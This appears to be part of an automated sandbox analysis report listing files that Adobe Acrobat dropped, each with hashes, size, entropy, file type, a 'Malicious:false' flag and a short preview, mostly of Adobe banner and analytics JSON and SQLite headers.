                                                                                        Preview:p...... ........R..Z.U..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.339827224919612
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJM3g98kUwPeUkwRe9:YvXKXftZhXiZc0vGTGMbLUkee9
                                                                                        MD5:6E129D5E14302E30268E6424C6EEA3CB
                                                                                        SHA1:5F25861D8E00CE03BA4C291D02778A43D27D6A84
                                                                                        SHA-256:63B609583A421BE30C8FEAEA178281B5E12509E51A2591E30D3FFAB5E1C17F57
                                                                                        SHA-512:794047F930383464D3BE745DF96806E353A4B982404E7129675689C421F9C1B92760B931CECCDF5127C598FE9A08D17D4A1EB99EDB89CBD3B81B3F95CA42B028
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.288546828108583
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJfBoTfXpnrPeUkwRe9:YvXKXftZhXiZc0vGTGWTfXcUkee9
                                                                                        MD5:1ED23A964B626B171F152E4A93908513
                                                                                        SHA1:F67DB7185F99AE8EB2C37644585C75A20B0256BC
                                                                                        SHA-256:8C7765FDA5B799B3F8AB72AE0787A7EE79A382AC164D5F8CF149BCBA5F93FEAF
                                                                                        SHA-512:F6BE8409A156967F21867FC89FB8F50960A32308E233882906CEE16B0ABB5C868E160A128A126EC9168D184D0747EAE2C4A9C2F7168425A743CF4059B39ABF3B
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.267095144634588
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJfBD2G6UpnrPeUkwRe9:YvXKXftZhXiZc0vGTGR22cUkee9
                                                                                        MD5:65EB164CBF9974ECB10EBD2EB6C1835C
                                                                                        SHA1:38C9517190E264D12A44C57FCFA1A12EBE19697E
                                                                                        SHA-256:8A7A555E667D6C1E0FEDA8D9C8910A668D82653D3499BD8247771C9FC318AFCB
                                                                                        SHA-512:81FFECD5A4207CC8ADBA4A8BC8946EBC68A17E2D08B8325D826DB2914DB5D41ACD2AC888EFE4C545516CBAFF2554C73248BC07F00D06FC19400D1246FEF70651
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):285
                                                                                        Entropy (8bit):5.326011900890295
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJfPmwrPeUkwRe9:YvXKXftZhXiZc0vGTGH56Ukee9
                                                                                        MD5:DC5682B1CA7F89B2D9628D516BBE2D04
                                                                                        SHA1:006ED92738FD482174520462FEB98A41367DD0AE
                                                                                        SHA-256:F87869572AB4108829B1F7CC35E308A7A0AA2224F3B657AE4E70EF28DF9C8C76
                                                                                        SHA-512:035B1ED216158C0B6A299878EE213A401C0BDA1B0CEA7F1B09E2ECACAC02CF6F87991AD2FEB0FC08AE4C70498D52B405F74ACCA6E0DDF2F26510A4AFD373A627
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1123
                                                                                        Entropy (8bit):5.68535710975483
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6Xfgzv7pLgE9cQx8LennAvzBvkn0RCmK8czOCCSK:YvfThgy6SAFv5Ah8cv/K
                                                                                        MD5:E6D122BE8D7E3B3DFD3A91146FD38244
                                                                                        SHA1:86FD1B4DB003A8936F2C06568CEAB0C2CD7A9409
                                                                                        SHA-256:12290240A2EF1707BFF48B8996071930D4D2E2A016251CAC91A2176F1B833FE7
                                                                                        SHA-512:35222C728182376E863BB0713A8E80630FEAF98EC346C3001E9A5D795E7E1CCFCAAE5687156D6DB93F691EA70678FEAF0D22076E25E32063C6814FA53696BD73
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.2693736395314
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJf8dPeUkwRe9:YvXKXftZhXiZc0vGTGU8Ukee9
                                                                                        MD5:BEAD63344EDA69FB59E88A46962254D7
                                                                                        SHA1:37A3092914529DF92F38451501E476A779638EB2
                                                                                        SHA-256:7B75431775B1E4856EA92FAE6DFF9E9E11F431AE80B96597F781E7D2C5CF2DF9
                                                                                        SHA-512:105E5864F903ACD8995E0A407A5C6FF6C514E3951709BA775A1808C4F25601DD6D228946E09478EEDB80C4DC8B7593AC084954838FEE3D136C29E5EB0A505F60
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):292
                                                                                        Entropy (8bit):5.274414514616247
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJfQ1rPeUkwRe9:YvXKXftZhXiZc0vGTGY16Ukee9
                                                                                        MD5:7C48643604769198B7235AD235D7DFEA
                                                                                        SHA1:773E2715B71008E4FE42A91CE06CB46E3786BBDD
                                                                                        SHA-256:EDD2BD6C1BC775F11665FCA6B6B1D6FA31591C386BDCD45D75FA8D285E17E6B3
                                                                                        SHA-512:11ED14B05A0101106A2760FA441C07E09F24B18B3B4B826B8A7F11E0FDE1819F65ECE847576CE58B4867315878CC086419271CD56E65F05226CBB24D8DADC4E5
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.277840824211004
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJfFldPeUkwRe9:YvXKXftZhXiZc0vGTGz8Ukee9
                                                                                        MD5:A64726D8A95CB7F9176038BBBF48A11A
                                                                                        SHA1:63280DF8A1CFB686A0B3FEB6426F945C663BBF4D
                                                                                        SHA-256:D4903EB3E92156841B983E767C7552F3E74DBD2EE8EE841F4FC8AD176548DCB6
                                                                                        SHA-512:84FE6622DD52CB59B702EFA3AFACFF65566BD6D7AA03E764C8418A2CCDC612307187958CE790524758472E66BC10288EC1892F974007C4E89788E9ABD556270A
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.294741716627587
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJfzdPeUkwRe9:YvXKXftZhXiZc0vGTGb8Ukee9
                                                                                        MD5:FA188D3FD5062BE12C3F261DCBAE3CDD
                                                                                        SHA1:9E879859DF2388C10C3D3ECCD995CE47632716F1
                                                                                        SHA-256:AAA67FFE881F98B64F8D2954E0C057E1AFE8072A925B390DAA5701F6324B7618
                                                                                        SHA-512:E9175D9D371A746F09D3948F7A8CC693CE1538066969D6EF6AB640FED1EC7B4D688EF4118D73FDDB01394B3B52B18E15D2A87764AB45E09D4BBB7746543CF1E3
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.27566432040527
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJfYdPeUkwRe9:YvXKXftZhXiZc0vGTGg8Ukee9
                                                                                        MD5:976D53226CB43F078FBFCE53CDEE4F2C
                                                                                        SHA1:8BA5091BBA59F60A9AA4CEB27607BAB394F88CEB
                                                                                        SHA-256:101D8C6CA1FAE184B11F80BA415AF36D4393F853773771D32811504A72BCEB29
                                                                                        SHA-512:2A127F363E8A51515B078C25C5AD3163D2E9F8E4FB0AD9F74BFDDA0AE9FA8C0F110F027FE46229AA347012A5F66E328FA31BA625FEDCE5F902C710C41F5A220B
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):284
                                                                                        Entropy (8bit):5.261585239092497
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJf+dPeUkwRe9:YvXKXftZhXiZc0vGTG28Ukee9
                                                                                        MD5:04CDE93F21306A13656935FAF8591053
                                                                                        SHA1:71A868B99497A54A8172CCB34D7667B78F3B7D2B
                                                                                        SHA-256:2FE208C25DC429BB54932FC725D60E7DB5D07ABCF65A75B8E7EA3BE2558B9466
                                                                                        SHA-512:00820F5BB40C386DB0AFC0AABFF6A4DAA603A645DEB4A4E1BB8560351A31C7DF1632BBE9EDB8AF89CBDE444D713CFDA51197035B31BB465A1089D82CF6F11F3E
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):291
                                                                                        Entropy (8bit):5.259378673608995
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJfbPtdPeUkwRe9:YvXKXftZhXiZc0vGTGDV8Ukee9
                                                                                        MD5:F3AE26E86EC4703F7373FEF4BE826A31
                                                                                        SHA1:827E8ADFE38AE54BF3B77951CAAC23D613A7F8CE
                                                                                        SHA-256:3BC9935A6B62AF37E2150F1E871822FBDF48568266DB8B23B7DAF06CA38D3A61
                                                                                        SHA-512:3AB3FAF28D9F8AEEAD430967CBE75A8DF9B1668BBD94A737FEBF58DF1FFB32C9AECB7341217D452F30902EC1D16D6B0BFE8879A88F107FEB2F945B036A12C65D
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):287
                                                                                        Entropy (8bit):5.264533252185302
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJf21rPeUkwRe9:YvXKXftZhXiZc0vGTG+16Ukee9
                                                                                        MD5:F58C3747DD7BB7517739DF0CB0034056
                                                                                        SHA1:C0FD5739ED39DC69531C2E5CAE7AE7E15747D603
                                                                                        SHA-256:3371962758E98365B5499A507C179298CCFFA053983C4F6060C6771250CA9E66
                                                                                        SHA-512:CFA9808AD37D7186B504499DC44F7CC6174C7FBF4D4932DB829EE273AE9DC641D7175E4359C4C7BD3DB7DB6A4383752BBAB533E73E9ED3327A79D23EF4FDAA36
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1090
                                                                                        Entropy (8bit):5.659982046436914
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6Xfgzv7amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSK:YvfTBgkDMUJUAh8cvMK
                                                                                        MD5:6FC1F7ED45D77AF9ACA9DEDFAA7BF0B1
                                                                                        SHA1:CDB88434A253B6153950702CCDE9EB93CC6306F7
                                                                                        SHA-256:A397186C40D98EE76064FFCCCC1A6EC5DA06A607DDCD79531446CCB10D14413C
                                                                                        SHA-512:E45E93220E085B00A8F3FE02BD129FAD424032406BD2FAEAE2742FD501BF2A24B9494864079BAAC4E64954BF2E5D3F69F2B8032F79EF0D642A39FA69D96DBC78
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):286
                                                                                        Entropy (8bit):5.2384042797764065
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJfshHHrPeUkwRe9:YvXKXftZhXiZc0vGTGUUUkee9
                                                                                        MD5:99B1BBF14B5156475F046B3DCFD9804E
                                                                                        SHA1:E3E323B7F0B5F274DE274E4197F0C5743093CC1A
                                                                                        SHA-256:8E9C40BF36B19AB9B07A9A5C79F53A39E77AA4BB767CEC4B992140FC7753104D
                                                                                        SHA-512:629E83A3DFD098BC91532B43DC36BE814CA15E56E8C7CDEADC3CC0643A0FEA224E307DF3F06F2A91BAF0D663CCA341C896375FCE4ADF55E2E2D264AF277F098E
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):282
                                                                                        Entropy (8bit):5.241532830555484
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXftPBhXLVoZcg1vRcR0YllqoAvJTqgFCrPeUkwRe9:YvXKXftZhXiZc0vGTGTq16Ukee9
                                                                                        MD5:1674C07A9E5FD00F588FD1BAA7696432
                                                                                        SHA1:203ABFB70EAD3359CA4CDF5B80EBFF458899E584
                                                                                        SHA-256:C249A91E758BFBE06BE64C6AA4566168CE2A48DB32CAB3841417B8BB92ACBEFB
                                                                                        SHA-512:9D89B909AF1D312985873BBDD27F92EE2D5F88901463B25C4DF72A238AA3107C83E89A3CB5F806412D787D83201C8A0B75428A80D445030D51DB33F4F94308BD
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"ea03803e-13a3-42fa-8ac2-3d012dd5a25c","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1735202824740,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4
                                                                                        Entropy (8bit):0.8112781244591328
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:e:e
                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                        Malicious:false
                                                                                        Preview:....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2814
                                                                                        Entropy (8bit):5.133557045814862
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:Yqv24VnE7rG/blB7lq7nvoOwE9H/cQ8RZIh9I:JO4BAK/blVlqE8fcQ8HI/I
                                                                                        MD5:A4FA7B59347968C2A7DCA25D3361BF70
                                                                                        SHA1:3B4777BAEC39C46B73A694E57850CD265419CDB6
                                                                                        SHA-256:E9A1819DD81DE796C19B0708FAE0699F73A5AC1900A1A5E2C2A141C6DC6EE183
                                                                                        SHA-512:2F5F25CE4FC1792692176F004387D68627FF0A8FBF870BECEA391053E31D7D860AE5D9E8F5BF795C88440D716D0F00F6C93576DD3E727EE9F75BB3FE083D3BB7
                                                                                        Malicious:false
                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"87cd2c28d6ad1326a1bd99da202fa014","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1735028254000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"593b60ae282bd466fafd604abc72eba1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1735028254000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"978930ab3394770afbfe0fd64a387ea4","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1735028254000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"59c5c8a9102ec6aff869a6ca60df2280","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1735028254000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"2941ec2099ee2eecc2e15e9e67bc9946","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1735028254000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"9f1162596543944dbe014a871900137c","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                        Category:dropped
                                                                                        Size (bytes):12288
                                                                                        Entropy (8bit):1.1874525260780875
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:TGufl2GL7msEHUUUUUUUUvSSvR9H9vxFGiDIAEkGVvpDU:lNVmswUUUUUUUUvS+FGSItvU
                                                                                        MD5:8FA214BDA9D175F236F657CF25926D2F
                                                                                        SHA1:E7AFFA897F757FF66CD9998949E2C59AA88ACC39
                                                                                        SHA-256:2058ACFB901309C4797AAE9C4361880C8E3E5453974E4EFE8CED32D52B14FC59
                                                                                        SHA-512:BE2CA936FDE68A80EC1325D08A1DB847C596184BF8C68B28CE0BAB02F568B6C2CE80FDEA687B349B1D95A79DDD20C2E451614CE083166A25773D10B1349AD7E3
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):1.6067421857024096
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:7MjKUUUUUUUUUUvAvR9H9vxFGiDIAEkGVv2qFl2GL7msJ:7VUUUUUUUUUUv4FGSItYKVmsJ
                                                                                        MD5:3CE91AA9A743BDB076B04F2D54B779ED
                                                                                        SHA1:0555ECBD827618C1946DAD915A9A69C6729B452F
                                                                                        SHA-256:3A56494FC34DC8D1F59250A95D6CBAF28D7D36E4891248010330EC28ACE36A63
                                                                                        SHA-512:2EA7462B70EF2F88DF2FC35B3CE9AFAE8DE77D8C148C7485CD7CF2279967B29AB50A598FF5FDFE9FAE5F31548C50B69463BA7833C55C4E4508BC496A8E649388
                                                                                        Malicious:false
                                                                                        Preview:.... .c......k7......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):66726
                                                                                        Entropy (8bit):5.392739213842091
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgr2l12mfFITmSF3Ggww48x8nYFYyu:6a6TZ44ADEr2z2mdITmSsYFK
                                                                                        MD5:6D33B396E85FB8FADE676B56C0D268D4
                                                                                        SHA1:BE37D998BF1F109045F9D060DE0F9D379EFBFEF8
                                                                                        SHA-256:B3B37C655753CA3CA16A509B636C69F4ACCDC05302C9881DE1B8A919C20D3BFB
                                                                                        SHA-512:8F6219D0320F770E4873747750121B64236BB39962F18DD112C9395C3A86DED05030985B763CD906D4E02793E8537397442168BD809694D1DE60667E44A0E4A0
                                                                                        Malicious:false
